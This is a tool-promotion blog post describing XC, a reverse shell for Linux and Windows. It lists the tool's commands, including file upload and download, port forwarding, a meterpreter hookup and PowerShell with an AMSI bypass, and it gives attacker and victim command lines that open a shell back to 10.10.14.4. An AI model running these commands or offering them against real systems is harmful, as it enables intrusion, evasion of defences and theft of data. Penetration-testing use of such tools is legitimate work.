Kali Linux

XC : A Small Reverse Shell For Linux And Windows

XC is a Netcat like reverse shell for Linux & Windows.

Features

Windows

Usage:
└ Shared Commands: !exit
!upload

  • uploads a file to the target
    !download
  • downloads a file from the target
    !lfwd
  • local portforwarding (like ssh -L)
    !rfwd
  • remote portforwarding (like ssh -R)
    !lsfwd
  • lists active forwards
    !rmfwd
  • removes forward by index
    !plugins
  • lists available plugins
    !plugin
  • execute a plugin
    !spawn
  • spawns another client on the specified port
    !shell
  • runs /bin/sh
    !runas
  • restart xc with the specified user
    !met
  • connects to a x64/meterpreter/reverse_tcp listener └ OS Specific Commands: !powershell
    • starts powershell with AMSI Bypass
      !rc
    • connects to a local bind shell and restarts this client over it
      !runasps
    • restart xc with the specified user using powershell
      !vulns
    • checks for common vulnerabilities

Linux

Usage:
└ Shared Commands: !exit
!upload

  • uploads a file to the target
    !download
  • downloads a file from the target
    !lfwd
  • local portforwarding (like ssh -L)
    !rfwd
  • remote portforwarding (like ssh -R)
    !lsfwd
  • lists active forwards
    !rmfwd
  • removes forward by index
    !plugins
  • lists available plugins
    !plugin
  • execute a plugin
    !spawn
  • spawns another client on the specified port
    !shell
  • runs /bin/sh
    !runas
  • restart xc with the specified user
    !met
  • connects to a x64/meterpreter/reverse_tcp listener
    └ OS Specific Commands:
    !ssh
  • starts sshd with the configured keys on the specified port

Examples

  • Linux Attacker: rlwrap xc -l -p 1337 (Server)
  • WindowsVictim : xc.exe 10.10.14.4 1337 (Client)
  • Argumentless: xc_10.10.14.4_1337.exe (Client)

Setup

Make sure you are running golang version 1.15+, older versions will not compile. I tested it on ubuntu: go version go1.16.2 linux/amd64 and kali go version go1.15.9 linux/amd64

git clone –recurse-submodules https://github.com/xct/xc.git
GO111MODULE=off go get golang.org/x/sys/…
GO111MODULE=off go get golang.org/x/text/encoding/unicode
GO111MODULE=off go get github.com/hashicorp/yamux
sudo apt-get install rlwrap upx

Linux

python3 build.py

R K

Recent Posts

Bad Py — A Simple Bad Tool : A Seemingly Straightforward Tool That Embodies

A tool crafted with simplicity in mind but harboring its own set of flaws. Despite…

2 days ago

CyberSentry – Automated Web Vulnerability Scanner

CyberSentry is a robust automated scanning tool designed for web applications. It helps security professionals, ethical…

2 days ago

DARKARMY – A Comprehensive Overview Of Tools For Cybersecurity Professionals

Delve into the world of DARKARMY, a potent arsenal of cybersecurity tools designed to empower…

2 days ago

League Of Legends Cheat – Enhancing Your Gameplay With Advanced Features

Evade (Evasion) - this feature helps you to evade spells of enemies directed at you…

2 days ago

Cazador – A Comprehensive Toolkit For Bug Hunters

Step into the world of bug hunting with Cazador, a powerful toolkit designed to equip…

2 days ago

Download Among Us MOD MENU 2024 For PC – Unleash Chaos With Enhanced Features!

Prepare to take your Among Us gaming experience to the next level with the latest…

2 days ago